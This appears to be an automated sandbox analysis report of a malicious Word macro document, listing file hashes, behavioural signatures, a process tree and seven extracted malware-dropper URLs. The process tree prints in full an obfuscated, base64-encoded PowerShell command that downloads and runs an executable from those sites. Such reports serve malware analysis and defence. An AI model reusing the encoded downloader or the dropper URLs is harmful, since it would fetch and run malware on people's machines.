Analysis

  • max time kernel
    121s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
  • submitted
    20/09/2024, 05:27

General

  • Target

    ececa7f4d7c922fa9707e1d52f42cf92_JaffaCakes118.doc

  • Size

    201KB

  • MD5

    ececa7f4d7c922fa9707e1d52f42cf92

  • SHA1

    743ca04fff27e4f1b92502165d1093c7678d1525

  • SHA256

    235c1596d946f273671bd85c3edbd0a70adc0108e4e4c8c4b67c9fbd4665e4a3

  • SHA512

    333e148688054dcbba8ef5ccf707144bcaec66a801900c9422828e45e080baa78ea2134466e0a8e40fc23f559ce20dc89ecb9d6c4af2b7273f6ed0beda30e036

  • SSDEEP

    3072:dUqJ1NgsA8k/gvh0NZ0lGX1nZ7ZqpSgKsiEHE+b64JE:dBtgVIveNZvn0zKjEkc6cE

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://bavhome.com/wp-content/td/

exe.dropper

http://hercinovic.com/cgi-bin/mZt/

exe.dropper

https://jeffdahlke.com/css/3u/

exe.dropper

http://calledtochange.org/CalledtoChange/V/

exe.dropper

http://daoisthealing.com/cgi-bin/c/

exe.dropper

https://scyzm.net/wp-content/j/

exe.dropper

http://www.bismarjeparamebel.com/u/pCp/

Signatures

  • Blocklisted process makes network request 8 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Office loads VBA resources, possible macro or embedded object present
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\ececa7f4d7c922fa9707e1d52f42cf92_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1724
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1716
    • C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe
      POwersheLL -ENCOD JABCADYAdAAwAGcAZwBnAD0AKAAoACcAUABhACcAKwAnAHcAcABnACcAKwAnAHYAJwApACsAJwBhACcAKQA7AC4AKAAnAG4AZQB3AC0AJwArACcAaQB0AGUAJwArACcAbQAnACkAIAAkAEUATgB2ADoAdQBTAGUAcgBwAFIAbwBGAGkATABlAFwAeABfAHgANQBWAFoAcgBcAEYAOABCAFkAZQBhAE8AXAAgAC0AaQB0AGUAbQB0AHkAcABlACAARABpAFIAZQBDAHQATwByAHkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAHMAZQBgAGMAYABVAGAAUgBpAHQAeQBgAHAAcgBvAHQATwBjAG8AbAAiACAAPQAgACgAKAAnAHQAbABzADEAJwArACcAMgAnACsAJwAsACcAKQArACgAJwAgACcAKwAnAHQAbAAnACkAKwAoACcAcwAxADEALAAgACcAKwAnAHQAJwApACsAJwBsAHMAJwApADsAJABIAHUAcgBwAGgAdwBpACAAPQAgACgAKAAnAFkAeQAnACsAJwB4ACcAKQArACcAbgBvACcAKwAnADMAJwApADsAJABMAGIAagB5ADAAZAAxAD0AKAAoACcARwBnAHgAJwArACcAbgAnACkAKwAoACcAbQBkACcAKwAnAGoAJwApACkAOwAkAEQAcwA2ADcANgBlAG8APQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAKAAoACcAewAnACsAJwAwAH0AWABfAHgAJwArACcANQB2AHoAcgB7ADAAfQBGACcAKwAnADgAYgB5AGUAYQBvAHsAMAB9ACcAKQAgACAALQBGAFsAYwBoAEEAUgBdADkAMgApACsAJABIAHUAcgBwAGgAdwBpACsAKAAoACcALgAnACsAJwBlAHgAJwApACsAJwBlACcAKQA7ACQAUwA1ADMAaQB1AGMAYwA9ACgAJwBQACcAKwAnADcANgAnACsAKAAnADEAJwArACcAcQBuAGIAJwApACkAOwAkAFYAeQBlAHkAcgBiAGMAPQAmACgAJwBuACcAKwAnAGUAdwAnACsAJwAtAG8AYgAnACsAJwBqAGUAYwB0ACcAKQAgAG4AZQB0AC4AVwBFAGIAYwBsAEkAZQBOAFQAOwAkAFoAXwBoADcAXwB4AGEAPQAoACgAJwBoACcAKwAnAHQAdABwADoALwAvACcAKwAnAGIAJwArACcAYQB2AGgAJwApACsAKAAnAG8AJwArACcAbQBlAC4AJwApACsAKAAnAGMAJwArACcAbwBtAC8AJwApACsAKAAnAHcAcAAnACsAJwAtAGMAbwAnACkAKwAnAG4AdAAnACsAKAAnAGUAbgB0AC8AJwArACcAdAAnACkAKwAnAGQAJwArACcALwAqACcAKwAnAGgAJwArACcAdAAnACsAKAAnAHQAcAA6AC8ALwAnACsAJwBoAGUAJwArACcAcgBjAGkAbgBvAHYAJwArACcAaQBjACcAKwAnAC4AJwArACcAYwAnACkAKwAnAG8AbQAnACsAKAAnAC8AYwBnACcAKwAnAGkALQBiACcAKwAnAGkAbgAvACcAKQArACcAbQAnACsAKAAnAFoAdAAnACsAJwAvACoAaAAnACsAJwB0AHQAJwArACcAcABzADoALwAnACkAKwAnAC8AagAnACsAKAAnAGUAJwArACcAZgBmACcAKQArACcAZAAnACsAKAAnAGEAJwArACcAaABsACcAKQArACgAJwBrAGUAJwArACcALgAnACkAKwAnAGMAbwAnACsAKAAnAG0ALwBjAHMAJwArACcAcwAnACkAKwAnAC8AMwAnACsAKAAnAHUALwAnACsAJwAqAGgAdAAnACkAKwAoACcAdABwACcAKwAnADoALwAvACcAKQArACgAJwBjAGEAJwArACcAbAAnACkAKwAoACcAbAAnACsAJwBlAGQAJwApACsAKAAnAHQAbwAnACsAJwBjAGgAYQBuACcAKwAnAGcAZQAuAG8AJwApACsAJwByACcAKwAnAGcAJwArACgAJwAvAEMAYQAnACsAJwBsACcAKQArACcAbABlACcAKwAoACcAZAB0ACcAKwAnAG8AQwBoAGEAJwApACsAKAAnAG4AZwAnACsAJwBlAC8AJwApACsAJwBWAC8AJwArACcAKgAnACsAJwBoACcAKwAoACcAdAB0ACcAKwAnAHAAJwArACcAOgAvAC8AJwApACsAJwBkAGEAJwArACgAJwBvAGkAcwB0ACcAKwAnAGgAZQBhACcAKQArACgAJwBsACcAKwAnAGkAbgBnAC4AYwBvAG0ALwAnACkAKwAnAGMAZwAnACsAKAAnAGkALQBiAGkAbgAnACsAJwAvAGMALwAnACsAJwAqACcAKwAnAGgAdAB0AHAAJwApACsAKAAnAHMAJwArACcAOgAvAC8AJwApACsAKAAnAHMAJwArACcAYwB5ACcAKQArACgAJwB6ACcAKwAnAG0ALgBuAGUAdAAnACsAJwAvACcAKQArACcAdwAnACsAJwBwACcAKwAnAC0AJwArACcAYwBvACcAKwAoACcAbgAnACsAJwB0AGUAJwArACcAbgB0AC8AagAnACsAJwAvACoAaAAnACkAKwAnAHQAJwArACgAJwB0AHAAOgAnACsAJwAvACcAKQArACgAJwAvAHcAJwArACcAdwAnACkAKwAoACcAdwAuACcAKwAnAGIAaQBzAG0AJwApACsAJwBhAHIAJwArACgAJwBqAGUAcABhAHIAYQAnACsAJwBtACcAKwAnAGUAJwArACcAYgBlAGwALgAnACsAJwBjAG8AbQAvAHUAJwApACsAKAAnAC8AJwArACcAcABDAHAAJwApACsAJwAvACcAKQAuACIAUwBgAHAATABpAFQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABIAGcAZAA5ADgAdABpAD0AKAAoACcAVwAwACcAKwAnAG4AagAnACkAKwAoACcAdABoACcAKwAnAHkAJwApACkAOwBmAG8AcgBlAGEAYwBoACgAJABVAGcAZgB1AG4AYQB3ACAAaQBuACAAJABaAF8AaAA3AF8AeABhACkAewB0AHIAeQB7ACQAVgB5AGUAeQByAGIAYwAuACIARABvAGAAVwBgAE4ATABPAEEAZABmAGkAYABMAEUAIgAoACQAVQBnAGYAdQBuAGEAdwAsACAAJABEAHMANgA3ADYAZQBvACkAOwAkAFIAbQA5AHUAdwB0AGUAPQAoACcAWgAnACsAJwA2ACcAKwAoACcAYwBjACcAKwAnAGkAYQB3ACcAKQApADsASQBmACAAKAAoAC4AKAAnAEcAZQB0AC0AJwArACcASQB0AGUAbQAnACkAIAAkAEQAcwA2ADcANgBlAG8AKQAuACIATABgAGUATgBnAHQASAAiACAALQBnAGUAIAAzADcAOQA5ADEAKQAgAHsALgAoACcASQBuAHYAbwBrAGUAJwArACcALQBJACcAKwAnAHQAJwArACcAZQBtACcAKQAoACQARABzADYANwA2AGUAbwApADsAJABFAGQAZwBfAG0AbwBoAD0AKAAnAEEAJwArACcAbgAnACsAKAAnAHcAMQAnACsAJwA0ADcAbwAnACkAKQA7AGIAcgBlAGEAawA7ACQAVABiAGUAcAByADUAMgA9ACgAKAAnAFMAJwArACcAMABjACcAKQArACgAJwBxAGYAdAAnACsAJwA3ACcAKQApAH0AfQBjAGEAdABjAGgAewB9AH0AJABMAGUAbQBlAHMAZABuAD0AKAAoACcAVAAwAHcAZgAnACsAJwBzACcAKQArACcAeQBnACcAKQA=
      1⤵
      • Blocklisted process makes network request
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2620

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      19KB

      MD5

      a5e39d9fd8ec471cf3c9675ede29abd8

      SHA1

      361b4e471e2b303e7508aaa91c55a92ece1f18c2

      SHA256

      36974b58a9228d27c9b1c5ed12557e3e3522b9898e6400b2dd3d0ddfdb47f2d5

      SHA512

      2b3baf0ec3485bff30d9963a21d06fba107cc507af19b1efdeb81ccffcc7350fcc86947c63384faea43761ae3d7909991286fe61e505cb72bd4532301fc6dbdf

    • memory/1724-42-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/1724-40-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/1724-39-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/1724-5-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/1724-7-0x0000000005D10000-0x0000000005E10000-memory.dmp

      Filesize

      1024KB

    • memory/1724-8-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/1724-28-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/1724-29-0x0000000005A20000-0x0000000005B20000-memory.dmp

      Filesize

      1024KB

    • memory/1724-20-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/1724-19-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/1724-18-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/1724-17-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/1724-15-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/1724-16-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/1724-14-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/1724-13-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/1724-12-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/1724-43-0x0000000005A20000-0x0000000005B20000-memory.dmp

      Filesize

      1024KB

    • memory/1724-46-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/1724-0-0x000000002FC31000-0x000000002FC32000-memory.dmp

      Filesize

      4KB

    • memory/1724-2-0x000000007120D000-0x0000000071218000-memory.dmp

      Filesize

      44KB

    • memory/1724-41-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/1724-6-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/1724-21-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/1724-78-0x000000007120D000-0x0000000071218000-memory.dmp

      Filesize

      44KB

    • memory/1724-77-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/1724-38-0x0000000005A20000-0x0000000005B20000-memory.dmp

      Filesize

      1024KB

    • memory/1724-37-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/1724-33-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/1724-32-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/1724-31-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/1724-30-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/1724-11-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/1724-10-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/1724-9-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/1724-54-0x000000007120D000-0x0000000071218000-memory.dmp

      Filesize

      44KB

    • memory/1724-55-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/1724-56-0x0000000005A20000-0x0000000005B20000-memory.dmp

      Filesize

      1024KB

    • memory/1724-57-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/1724-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2620-52-0x000000001B770000-0x000000001BA52000-memory.dmp

      Filesize

      2.9MB

    • memory/2620-53-0x0000000001EF0000-0x0000000001EF8000-memory.dmp

      Filesize

      32KB